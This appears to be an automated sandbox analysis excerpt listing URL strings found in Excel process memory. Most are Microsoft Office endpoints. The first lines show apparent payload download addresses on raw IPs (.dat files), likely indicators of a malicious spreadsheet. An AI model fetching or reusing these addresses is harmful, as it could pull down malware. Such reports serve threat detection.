Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.126.78/939602286691.dat2:8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://185.82.126.78/939602286691.dat78
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://45.142.211.62/939602286691.dat
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://45.142.211.62/939602286691.dat%9
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://45.142.211.62/939602286691.dat2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: http://45.142.211.62/939602286691.dat2-8
Source: EXCEL.EXE, 00000000.00000003.662083291.00000000131C2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EXCEL.EXE, 00000000.00000002.962261125.000000000DDDF000.00000004.00000001.sdmp	String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
Source: EXCEL.EXE, 00000000.00000002.962236753.000000000DDBF000.00000004.00000001.sdmp	String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tablea
Source: EXCEL.EXE, 00000000.00000003.811957461.0000000015B00000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812216756.0000000015D0F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811919748.0000000015D45000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000003.811957461.0000000015B00000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000003.812216756.0000000015D0F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811919748.0000000015D45000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://addinsinstallation.store.office.com/app/downloadw&
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatedQ
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedB
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeh
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryv
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech&
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.aadrm.com/HU9
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query~
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.addins.store.office.com/addinstemplate(
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.addins.store.office.com/app/querym
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.diagnostics.office.comom
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.microsoftstream.com/api/nt2
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.office.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.office.net%W
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.office.net9V
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.office.net_V(
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.onedrive.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.onedrive.comcent
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.powerbi.com/beta/myorg/importsp
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
